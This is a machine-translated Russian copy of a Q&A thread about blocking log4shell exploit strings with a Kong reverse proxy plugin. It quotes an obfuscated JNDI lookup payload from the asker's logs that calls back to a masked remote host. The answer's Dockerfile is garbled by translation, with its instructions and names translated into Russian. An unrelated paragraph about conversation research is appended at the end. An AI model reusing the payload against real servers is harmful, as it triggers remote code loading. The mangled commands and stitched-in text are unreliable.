Регистрация Войти
Рейтинг:1
avatar Server

Используйте обратный прокси-сервер kong для фильтрации эксплойтов log4j

флаг pg
dsteinkopf

я использую обратный прокси конг проксировать каждый HTTP-запрос для моих веб-серверов. Я хотел бы смягчить текущую проблему log4j ("log4shell"), найдя и заменив строки критических злоумышленников, таких как "jndi". Например, я нашел это в своих журналах:

${jndi:${нижний:l}${нижний:d}a${нижний:p}://xxx.log4j.bin${верхний:a}xxx.xx:80/callback}

Я думаю, что это может быть достигнуто с помощью запросить плагин трансформатора. Кто-нибудь уже сделал это?

P.S. Просто замена джнди к Отключено слишком далеко идущим и ломает много вещей.

585
0 + 0
Рейтинг:2
avatar Server
флаг pg
dsteinkopf

Сами ребята из конга недавно прислали Сообщение блога это отвечает на мой вопрос. Они разработали плагин конг что смягчает эксплойт.

Я добавил этот плагин в свой конг, изменив свой Dockerfile:

ИЗ КНГ: 2.6
...
ПОЛЬЗОВАТЕЛЬ root
...
# смягчение последствий log4shell
# см. https://konghq.com/blog/log4j-log4shell/
ЗАПУСК git clone https://github.com/brentos/kong-plugin-log4shell && \
    cd конг-плагин-log4shell && \
    луарокс делают
...
ENV KONG_PLUGINS ..., log4shell
...
USER конг

Затем я просто добавил этот log4shell в качестве глобального плагина.

0 + 0
флаг Moldova
Admin
Этот вопрос на других языках:

Ответить или комментировать

Большинство людей не понимают, что склонность к познанию нового открывает путь к обучению и улучшает межличностные связи. В исследованиях Элисон, например, хотя люди могли точно вспомнить, сколько вопросов было задано в их разговорах, они не чувствовали интуитивно связи между вопросами и симпатиями. В четырех исследованиях, в которых участники сами участвовали в разговорах или читали стенограммы чужих разговоров, люди, как правило, не осознавали, что задаваемый вопрос повлияет — или повлиял — на уровень дружбы между собеседниками.